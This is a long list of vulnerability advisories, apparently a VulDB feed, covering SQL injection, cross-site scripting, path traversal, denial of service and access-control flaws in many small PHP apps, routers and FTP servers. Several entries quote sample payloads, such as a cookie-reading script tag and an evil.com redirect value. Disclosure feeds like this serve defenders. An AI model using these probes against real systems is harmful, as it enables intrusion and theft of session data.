A vulnerability, which was classified as problematic, was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. Affected is an unknown function of the file mainscripts/Util.py. The manipulation leads to deserialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-251382 is the identifier assigned to this vulnerability.
A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file search-visitor.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251378 is the identifier assigned to this vulnerability.
A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search-visitor.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251377 was assigned to this vulnerability.
A vulnerability was found in Project Worlds Visitor Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file dataset.php of the component URL Handler. The manipulation of the argument name with the input "&gt;&lt;script&gt;alert('torada')&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251376.
A vulnerability has been found in Yunyou CMS up to 2.2.6 and classified as critical. This vulnerability affects unknown code of the file /app/index/controller/Common.php. The manipulation of the argument templateFile leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251374 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability.
A vulnerability classified as critical has been found in ZhiCms up to 4.0. This affects an unknown part of the file app/plug/controller/giftcontroller.php. The manipulation of the argument mylike leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250839.
A vulnerability was found in Jspxcms 10.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file src\main\java\com\jspxcms\core\web\back\InfoController.java of the component Document Management Page. The manipulation of the argument title leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250837 was assigned to this vulnerability.
A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability.
A vulnerability has been found in DedeBIZ 6.3.0 and classified as critical. This vulnerability affects unknown code of the file /admin/makehtml_freelist_action.php. The manipulation of the argument startid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250726 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in DedeBIZ 6.3.0. This affects an unknown part of the component Website Copyright Setting. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250725 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in FreeFloat FTP Server 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component SIZE Command Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250718 is the identifier assigned to this vulnerability.
A vulnerability has been found in Ability FTP Server 2.34 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component APPE Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250717 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in EasyFTP 1.7.0. This issue affects some unknown processing of the component LIST Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250715.
A vulnerability classified as problematic was found in CodeCanyon RISE Rise Ultimate Project Manager 3.5.3. This vulnerability affects unknown code of the file /index.php/signin. The manipulation of the argument redirect with the input http://evil.com leads to open redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250714 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in CodeAstro Real Estate Management System up to 1.0. This affects an unknown part of the file propertydetail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250713 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Tenda A15 15.13.07.13. Affected is an unknown function of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250704. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tenda A15 15.13.07.13. It has been rated as critical. This issue affects some unknown processing of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250703. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tenda A15 15.13.07.13. It has been declared as critical. This vulnerability affects unknown code of the file /goform/WifiExtraSet of the component Web-based Management Interface. The manipulation of the argument wpapsk_crypto2_4g leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250702 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tenda A15 15.13.07.13. It has been classified as critical. This affects an unknown part of the file /goform/setBlackRule of the component Web-based Management Interface. The manipulation of the argument deviceList leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250701 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /apps/reg_go.php of the component HTTP POST Request Handler. The manipulation of the argument username_reg leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250700. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /apps/login_auth.php of the component HTTP POST Request Handler. The manipulation of the argument username_login leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250699. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in CXBSoft Post-Office 1.0. Affected is an unknown function of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250698 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in CXBSoft Url-shorting up to 1.3.1. This issue affects some unknown processing of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250697 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in CXBSoft Url-shorting up to 1.3.1. This vulnerability affects unknown code of the file /pages/short_to_long.php of the component HTTP POST Request Handler. The manipulation of the argument shorturl leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250696. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in CXBSoft Url-shorting up to 1.3.1. This affects an unknown part of the file /pages/long_s_short.php of the component HTTP POST Request Handler. The manipulation of the argument longurl leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in CXBSoft Url-shorting up to 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument url leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure.
A vulnerability has been found in code-projects Simple Online Hotel Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file add_reserve.php of the component Make a Reservation Page. The manipulation of the argument Firstname/Lastname with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250618 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611.
A vulnerability was found in SourceCodester House Rental Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file manage_user.php of the component Edit User. The manipulation of the argument id/name/username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250610 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester House Rental Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Manage Invoice Details. The manipulation of the argument Invoice leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250609 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester House Rental Management System 1.0. Affected is an unknown function of the component Manage Tenant Details. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250608.
A vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607.
A vulnerability was found in Project Worlds Lawyer Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file searchLawyer.php. The manipulation of the argument experience leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250603.
A vulnerability was found in Campcodes Student Information System 1.0. It has been classified as critical. Affected is an unknown function of the file /classes/Users.php?f=save. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250602 is the identifier assigned to this vulnerability.
A vulnerability was found in Kashipara Billing Software 1.0 and classified as critical. This issue affects some unknown processing of the file item_list_edit.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250601 was assigned to this vulnerability.
A vulnerability has been found in Kashipara Billing Software 1.0 and classified as critical. This vulnerability affects unknown code of the file party_submit.php of the component HTTP POST Request Handler. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250600.
A vulnerability, which was classified as critical, was found in Kashipara Billing Software 1.0. This affects an unknown part of the file material_bill.php of the component HTTP POST Request Handler. The manipulation of the argument itemtypeid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250599.
A vulnerability, which was classified as critical, has been found in Kashipara Billing Software 1.0. Affected by this issue is some unknown functionality of the file submit_delivery_list.php of the component HTTP POST Request Handler. The manipulation of the argument customer_details leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250598 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in Kashipara Billing Software 1.0. Affected by this vulnerability is an unknown functionality of the file buyer_detail_submit.php of the component HTTP POST Request Handler. The manipulation of the argument gstn_no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250597 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Huaxia ERP up to 3.1. Affected is an unknown function of the file src/main/java/com/jsh/erp/controller/UserController.java. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250596.
A vulnerability was found in Huaxia ERP up to 3.1. It has been rated as problematic. This issue affects some unknown processing of the file /user/getAllList. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-250595.
A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/action/edit_chicken.php. The manipulation of the argument ref leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250594 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/action/new-feed.php. The manipulation of the argument type_feed leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250593 was assigned to this vulnerability.
A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/action/delete-vaccine.php. The manipulation of the argument ref leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250592.
A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/add_con.php. The manipulation of the argument chicken leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250591.
A vulnerability, which was classified as critical, was found in code-projects Fighting Cock Information System 1.0. Affected is an unknown function of the file admin/pages/tables/add_con.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250590 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in code-projects Fighting Cock Information System 1.0. This issue affects some unknown processing of the file admin/action/update_mother.php. The manipulation of the argument age_mother leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250589 was assigned to this vulnerability.
A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/edit_chicken.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250583.
A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/action/update-deworm.php. The manipulation of the argument usage_deworm leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250582 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Blood Bank &amp; Donor Management 1.0. This affects an unknown part of the file request-received-bydonar.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250581 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580.
A vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579.
A vulnerability classified as critical has been found in code-projects Dormitory Management System 1.0. Affected is an unknown function of the file comment.php. The manipulation of the argument com leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250578 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Dormitory Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file modifyuser.php. The manipulation of the argument mname leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-250577 was assigned to this vulnerability.
A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin_route/dec_service_credits.php. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250576.
A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been classified as critical. This affects an unknown part of the file /admin_route/inc_service_credits.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250575.
A vulnerability was found in code-projects Human Resource Integrated System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update_personal_info.php. The manipulation of the argument sex leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250574 is the identifier assigned to this vulnerability.
A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/new-father.php. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250573 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_position_query.php. The manipulation of the argument pos_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250572.
A vulnerability, which was classified as critical, has been found in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file file_table.php. The manipulation of the argument per_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250571.
A vulnerability classified as problematic was found in code-projects Employee Profile Management System 1.0. This vulnerability affects unknown code of the file download.php. The manipulation of the argument download_file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-250570 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in code-projects Online Faculty Clearance 1.0. This affects an unknown part of the file delete_faculty.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250569 was assigned to this vulnerability.
A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /production/admin_view_info.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250568.
A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567.
A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been classified as critical. Affected is an unknown function of the file deactivate.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250566 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability.
A vulnerability has been found in Blood Bank &amp; Donor Management 5.6 and classified as critical. This vulnerability affects unknown code of the file /admin/request-received-bydonar.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250564.
A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. This issue affects some unknown processing of the file admin/cms_template.php. The manipulation of the argument t_name/t_path leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250445 was assigned to this vulnerability.
A vulnerability classified as critical was found in ForU CMS up to 2020-06-23. This vulnerability affects unknown code of the file /admin/index.php?act=reset_admin_psw. The manipulation leads to weak password recovery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250444.
A vulnerability classified as problematic has been found in CodeAstro Simple Banking System 1.0. This affects an unknown part of the file createuser.php of the component Create a User Page. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250443.
A vulnerability was found in CodeAstro Online Food Ordering System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file dishes.php. The manipulation of the argument res_id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250442 is the identifier assigned to this vulnerability.
A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /new_item of the component New Item Creation Page. The manipulation of the argument new_item leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250441 was assigned to this vulnerability.
A vulnerability was found in Jasper httpdx up to 1.5.4 and classified as problematic. This issue affects some unknown processing of the component HTTP POST Request Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250439.
A vulnerability has been found in iSharer and upRedSun File Sharing Wizard up to 1.5.0 and classified as problematic. This vulnerability affects unknown code of the component GET Request Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250438 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in DeShang DSShop up to 2.1.5. This affects an unknown part of the file application/home/controller/MemberAuth.php. The manipulation of the argument member_info leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250437 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in DeShang DSMall up to 5.0.3. Affected by this issue is some unknown functionality of the file application/home/controller/MemberAuth.php. The manipulation of the argument file_name leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250436.
A vulnerability classified as critical was found in DeShang DSMall up to 6.1.0. Affected by this vulnerability is an unknown functionality of the file application/home/controller/TaobaoExport.php of the component Image URL Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250435.
A vulnerability classified as problematic has been found in DeShang DSCMS up to 3.1.2/7.1. Affected is an unknown function of the file public/install.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250434 is the identifier assigned to this vulnerability.
A vulnerability was found in DeShang DSKMS up to 3.1.2. It has been rated as problematic. This issue affects some unknown processing of the file public/install.php. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250433 was assigned to this vulnerability.
A vulnerability was found in DeShang DSShop up to 3.1.0. It has been declared as problematic. This vulnerability affects unknown code of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250432.
A vulnerability was found in DeShang DSMall up to 6.1.0. It has been classified as problematic. This affects an unknown part of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250431.
A vulnerability, which was classified as critical, was found in SourceCodester Student Attendance System 1.0. Affected is an unknown function of the file attendance_report.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250230 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file admin/query-details.php. The manipulation of the argument adminremark leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250131.
A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the file admin/patient-search.php. The manipulation of the argument searchdata leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250130 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in PHPGurukul Hospital Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/change-password.php. The manipulation of the argument cpass leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250129 was assigned to this vulnerability.
A vulnerability classified as critical has been found in PHPGurukul Hospital Management System 1.0. Affected is an unknown function of the file admin/contact.php. The manipulation of the argument mobnum leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250128.
A vulnerability was found in PHPGurukul Hospital Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/edit-doctor-specialization.php. The manipulation of the argument doctorspecilization leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250127.
A vulnerability was found in code-projects Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250126 is the identifier assigned to this vulnerability.
A vulnerability was found in DeShang DSO2O up to 4.1.0. It has been classified as critical. This affects an unknown part of the file /install/install.php. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250125 was assigned to this vulnerability.
A vulnerability was found in coderd-repos Eva 1.0.0 and classified as critical. Affected by this issue is some unknown functionality of the file /system/traceLog/page of the component HTTP POST Request Handler. The manipulation of the argument property leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250124.
A vulnerability has been found in Mandelo ssm_shiro_blog 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file updateRoles of the component Backend. The manipulation leads to improper access controls. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250123.
A vulnerability, which was classified as critical, was found in PHPGurukul Dairy Farm Shop Management System up to 1.1. Affected is an unknown function of the file add-category.php. The manipulation of the argument category leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250122 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in unknown-o download-station up to 1.1.8. This issue affects some unknown processing of the file index.php. The manipulation of the argument f leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250121 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Engineers Online Portal 1.0. This affects an unknown part. The manipulation leads to session fixiation. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250119.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-250118 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to sensitive cookie without secure attribute. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-250117 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the component File Upload Handler. The manipulation leads to resource consumption. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250116.
A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file signup_teacher.php. The manipulation of the argument Password leads to weak password requirements. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250115.
A vulnerability has been found in CodeAstro Vehicle Booking System 1.0 and classified as problematic. This vulnerability affects unknown code of the file usr/user-give-feedback.php of the component Feedback Page. The manipulation of the argument My Testemonial leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250114 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in CodeAstro Vehicle Booking System 1.0. This affects an unknown part of the file usr/usr-register.php of the component User Registration. The manipulation of the argument Full_Name/Last_Name/Address with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250113 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in soxft TimeMail up to 1.1. Affected by this issue is some unknown functionality of the file check.php. The manipulation of the argument c leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250112.
A vulnerability classified as problematic was found in CodeAstro Simple House Rental System 5.6. Affected by this vulnerability is an unknown functionality of the component Login Panel. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250111.
A vulnerability classified as critical has been found in Inis up to 2.0.1. Affected is an unknown function of the file /app/api/controller/default/Sqlite.php. The manipulation of the argument sql leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250110 is the identifier assigned to this vulnerability.
A vulnerability was found in Inis up to 2.0.1. It has been rated as problematic. This issue affects some unknown processing of the file /app/api/controller/default/File.php of the component GET Request Handler. The manipulation of the argument path leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. The identifier VDB-250109 was assigned to this vulnerability.
